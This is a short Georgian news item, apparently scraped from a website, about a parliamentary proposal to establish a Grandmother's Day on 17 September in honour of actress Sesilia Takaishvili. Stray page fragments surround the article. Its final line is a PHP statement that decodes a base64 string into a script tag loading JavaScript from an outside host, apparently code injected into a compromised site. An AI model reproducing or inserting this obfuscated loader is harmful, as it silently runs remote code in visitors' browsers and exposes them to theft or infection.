celsiusi
ავერსი შნაიდერი
ხვალ, 12 სექტემბერს, საქართველოს პარლამენტის ჯანმრთელობის დაცვისა და სოციალურ საკითხთა კომიტეტის სხდომაზე, ქვეყანაში ბებიის დღის ოფიციალურად დაწესებასთან დაკავშირებით საკანონმდებლო წინადადებას განიხილავენ.
 
ბებიის დღის დაწესების ინიციატივით, საქართველოს პარლამენტის თავმჯდომარეს, საქართველოს მოქალაქემ, ტელეკომპანია "პოსტივის" სცენარისტმა, მიხეილ სახვაძემ მიმდინარე წლის 17 მაისს მიმართა.
 
ინიციატივის ავტორი აღნიშნავს, რომ ბებიის დღის დაწესების საუკეთესო თარიღი 17 სექტემბერია, რადგან 17 სექტემბერი ცნობილი ქართველი მსახიობი სესილია თაყაიშვილის დაბადების დღეა.
 
სახვაძე აღნიშნავს, რომ მსახიობი სესილია თაყაიშვილმა ფილმებში ბებიის დაუვიწყარი სახეები შექმნა. კიდევ ერთ არგუმენტად, ინიციატივის ავტორი მიუთითებს, რომ "ბებია და ბარაქიანი შემოდგომა - რთველი, ჩურჩხელა, თათარა ჩვენს ქვეყანაში ერთმანეთთან მჭიდროდაა დაკავშირებული".
462
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");